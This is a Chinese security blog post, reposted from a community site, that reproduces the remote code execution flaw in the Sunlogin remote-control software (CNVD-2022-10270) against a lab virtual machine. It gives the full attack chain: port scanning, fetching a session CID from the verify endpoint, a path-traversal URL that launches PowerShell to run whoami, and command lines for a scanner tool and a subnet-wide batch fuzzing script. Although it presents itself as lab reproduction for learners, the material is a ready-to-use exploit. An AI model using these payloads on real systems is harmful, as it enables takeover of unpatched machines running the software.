前言
向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。
于2022年2月5日和2022年2月15日,CNVD公开上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),影响Windows系统使用的个人版和简约版,进攻者可利用该漏洞获取服务器控制权。
影响版本
漏洞级别
高危
环境搭建
在虚拟机里安装11.0.0.33的低版本向日葵
漏洞复现
使用nmap或其他工具探测目标端口
在浏览器中访问ip+端口号+cgi-bin/rpc?actinotallow=verify-haras (端口号:每一个都尝试,直到获取到session值CID)
Cookies添加拿到的CID后加上payload请求
http://192.168.52.133:49437/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+ whoami
手动复现完成
工具使用
使用工具自带的扫描
xrkRce.exe
-h ip -t scan
测试命令执行
批量检测
python3 sunlogin-fuzz.py -t 192.168.52.128/25
相关工具文件,安装包私信公众号向日葵获取
原文转载自,助安社区(https://secself.com/)
关注公众号【助安社区】安全零基础到入门都在这,社区内部红队沙龙、资源共享和大厂工作经验。真正热爱安全和喜欢技术交流的小伙伴欢迎加入我们。